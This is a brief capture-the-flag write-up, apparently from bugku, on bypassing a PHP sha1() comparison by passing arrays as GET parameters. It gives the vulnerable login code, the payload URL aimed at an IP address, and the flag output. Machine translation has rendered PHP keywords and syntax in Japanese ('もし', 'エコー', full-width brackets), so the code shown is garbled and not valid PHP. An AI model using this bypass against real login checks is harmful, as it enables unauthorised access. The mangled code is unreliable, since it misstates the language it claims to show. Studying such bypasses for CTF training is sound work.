コード監査-sha（）関数は、バイパスを比較します

<？PHPの
 $フラグ =「旗」。
もし（ISSET（$ _GET [ '名前']）とISSET（$ _GET [ 'パスワード' ]））
{ 
のvar_dump（$ _GET [ '名' ]）;
エコー「
」;
var_dump（$ _GET [ 'パスワード' ]）;
var_dump（SHA1（$ _GET [ '名' ]））;
var_dump（SHA1（$ _GET [ 'パスワード' ]））;
もし（$ _GET[「名前」] == $ _GET [「パスワード」を]）
 エコー " 

あなたのパスワードは自分の名前にすることはできません！
" ;
それ以外の 場合（SHA1（$ _GET [ '名前']）=== SHA1（$ _GET [ 'パスワード' ]））
、ダイ（ 'フラグ'。$フラグ）;
他
エコー " 

無効なパスワードを。
" ; 
} 
他
エコー " 

最初のログイン！
" ;
？>

同一の機能を有するのMD5、SHA、アレイをバイパスするために使用することができます

ペイロード

http：// 123.206.87.240:9009/7.php?name[]=1&password[]=2

得ます

 

アレイ（1）{[0] =>列（1） "1"}
アレイ（1）{[0] =>列（1） "2"} NULL NULLフラグ：フラグ{bugku - daimasj-A2}